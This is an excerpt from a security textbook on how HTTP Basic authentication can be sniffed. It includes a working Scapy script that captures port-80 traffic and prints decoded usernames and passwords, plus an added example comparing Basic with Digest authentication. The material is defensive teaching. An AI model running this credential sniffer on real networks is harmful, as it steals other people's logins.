Understanding Network Hacks by Bastian Ballmann

Author: Bastian Ballmann
Language: eng
Format: epub
Publisher: Springer Berlin Heidelberg, Berlin, Heidelberg


7.7 HTTP-Auth Sniffing

Most HTTP authentication runs in so-called Basic mode. Many administrators do not even know that the login data is transferred in plaintext when this method is selected, because it is only encoded with Base64 before being sent over the network. A short script demonstrates how easy it is for an attacker to grab all such HTTP authentications.

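    #!/usr/bin/python3

    import re
    from base64 import b64decode
    from scapy.all import sniff

    dev = "wlan0"

    def handle_packet(packet):
        tcp = packet.getlayer("TCP")
        if tcp is None:
            return

        # Search the raw TCP payload for a Basic auth header
        match = re.search(rb"Authorization: Basic ([A-Za-z0-9+/=]+)",
                          bytes(tcp.payload))

        if match:
            # Base64 is an encoding, not encryption: decoding yields user:password
            auth_str = b64decode(match.group(1)).decode("utf-8", "replace")
            # Split on the first colon only; the password may contain colons
            auth = auth_str.split(":", 1)
            if len(auth) == 2:
                print("User: " + auth[0] + " Pass: " + auth[1])

    # Capture HTTP traffic on the interface and pass each packet to the handler
    sniff(iface=dev,
          store=0,
          filter="tcp and port 80",
          prn=handle_packet)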

Once more we use the much-loved Scapy function sniff to read the HTTP traffic and, in the function handle_packet(), extract the TCP layer to access the actual payload. In the payload we search for the string Authorization: Basic and cut out the Base64 string that follows it with the help of a regular expression. If this succeeds, the string is decoded and split at the colon into username and password. That’s all it takes to circumvent HTTP-Basic-Auth! So do yourself a favor and use Digest-Authentication to protect your web applications with HTTP Auth!
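The difference behind that recommendation, as an added example that is not code from the book: the Basic header decodes straight back to the password, while a Digest response (RFC 2617, MD5, qop=auth) is a hash bound to a server nonce. The function names are hypothetical and the sample credentials are the constructed ones from the RFC 2617 worked example.

```python
import hashlib
import re
from base64 import b64decode, b64encode


def basic_header(user, password):
    """Build the Authorization value a client sends in Basic mode."""
    token = b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def recover_basic(header):
    """Decode a Basic header; no secret is needed to reverse Base64."""
    match = re.fullmatch(r"Basic ([A-Za-z0-9+/=]+)", header)
    if not match:
        return None
    user, _, password = b64decode(match.group(1)).decode().partition(":")
    return user, password


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(user, realm, password, method, uri, nonce, nc, cnonce,
                    qop="auth"):
    """Compute the RFC 2617 Digest 'response' field (MD5, qop=auth)."""
    ha1 = md5_hex(f"{user}:{realm}:{password}")   # secret never leaves as-is
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


if __name__ == "__main__":
    # Constructed sample values, taken from the worked example in RFC 2617
    user, password = "Mufasa", "Circle Of Life"
    hdr = basic_header(user, password)
    print("Basic on the wire :", hdr)
    print("Decodes back to   :", recover_basic(hdr))
    # The same credentials give a different response for every server nonce
    for nonce in ("dcd98b7102dd2f0e8b11d0f600bfb0c093", "0" * 32):
        resp = digest_response(user, "testrealm@host.com", password, "GET",
                               "/dir/index.html", nonce, "00000001", "0a4f113b")
        print("Digest response   :", resp, "(nonce", nonce[:8] + "...)")
```

Digest keeps the password itself off the wire, but the rest of the HTTP exchange is still readable without TLS, and a weak password can still be guessed offline from a captured response.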


